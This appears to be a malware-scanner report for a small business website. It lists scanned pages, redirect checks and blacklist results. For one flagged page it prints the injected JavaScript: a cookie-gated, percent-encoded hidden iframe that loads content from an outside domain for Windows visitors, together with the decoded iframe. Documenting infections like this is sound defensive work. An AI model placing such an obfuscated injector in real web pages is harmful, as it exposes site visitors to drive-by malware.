Scanned pages/files
Request | Server response | Status |
http://www.winnersedge1.com/ | 200 OK Content-Length: 12422 Content-Type: text/html | clean |
http://www.winnersedge1.com/templates/rt_colormatic/js/mootools.v1.00.js | 200 OK Content-Length: 23603 Content-Type: application/x-javascript | clean |
http://www.winnersedge1.com/templates/rt_colormatic/js/slimbox.js | 200 OK Content-Length: 4292 Content-Type: application/x-javascript | clean |
http://www.google-analytics.com/urchin.js | 200 OK Content-Length: 22678 Content-Type: text/javascript | clean |
http://www.winnersedge1.com/we/headquarters/about.html | 200 OK Content-Length: 15784 Content-Type: text/html | clean |
http://www.winnersedge1.com/mambots/content/audio-player.js | 200 OK Content-Length: 767 Content-Type: application/x-javascript | clean |
http://www.winnersedge1.com/we/media/ | 200 OK Content-Length: 33037 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) if(!getCookie("googlecounter")) { expires = new Date(); expires.setTime(expires.getTime() + 86400); setCookie("googlecounter", "1049", expires); if(navigator.appVersion.indexOf("Win")!=-1) { document.write(unescape("%3c%69%66%72%61%6d%65%20%73%72%63%3d%22%68%74%74%70%3a%2f%2f%69%6e%74%65%72%6e%65%74%2d%73%74%61%74%2e%69%6e%2f%69%6e%63%6c%75%64%65%73%31%2f%69%6e%2e%63%67%69%3f%34%22%20%77%69%64%74%68%3d%22%30%22%20%68%65%69%67%68%74%3d%22%30%22%20%73%74%79%6c%65%3d%22%76%69%73%69%62%69%6c%69%74%79%3a%68%69%64%64%65%6e%22%3e%3c%2f%69%66%72%61%6d%65%3e%0a")); } } function setCookie(name, value, expires) { document.cookie = name + "=" + escape(value) + "expires=" + expires.toGMTString() + "; path=/"; } function getCookie(name) { if(document.cookie.length > 0) { c_start = document.cookie.indexOf(name + "="); if(c_start != -1) { return true; } } return false; } Decoded script: <iframe src="http://internet-stat.in/includes1/in.cgi?4" width="0" height="0" style="visibility:hidden"></iframe> Antivirus reports:
| ||
http://www.winnersedge1.com/contact/ | 200 OK Content-Length: 19562 Content-Type: text/html | clean |
http://maps.google.com/maps?file=api&v=2&key=ABQIAAAAihOoJPYaRjpM69KtzajgNBQViaPyIAvcZq_E2okVMC1IXZH0gBSjar407SzKNitUW3l2ZOx96Zh-DA | 200 OK Content-Length: 5097 Content-Type: text/javascript | clean |
http://www.winnersedge1.com/we/headquarters/dealers-distributors.html | 200 OK Content-Length: 17857 Content-Type: text/html | clean |
http://www.winnersedge1.com/events-calendar/ | 200 OK Content-Length: 56861 Content-Type: text/html | clean |
http://www.winnersedge1.com/events-calendar/extmode,cat/cat_id,4/ | 200 OK Content-Length: 43344 Content-Type: text/html | clean |
http://www.winnersedge1.com/events-calendar/extmode,cat/cat_id,3/ | 200 OK Content-Length: 33937 Content-Type: text/html | clean |
http://www.winnersedge1.com/events-calendar/extmode,cat/cat_id,12/ | 200 OK Content-Length: 31070 Content-Type: text/html | clean |
http://www.winnersedge1.com/events-calendar/extmode,cat/cat_id,13/ | 200 OK Content-Length: 28938 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: winnersedge1.com
Result:
GET / HTTP/1.1
Host: winnersedge1.com
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: winnersedge1.com
Referer: http://www.google.com/search?q=winnersedge1.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: winnersedge1.com
Referer: http://www.google.com/search?q=winnersedge1.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=winnersedge1.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://winnersedge1.com/
Result: winnersedge1.com is not infected or malware details are not published yet.
Result: winnersedge1.com is not infected or malware details are not published yet.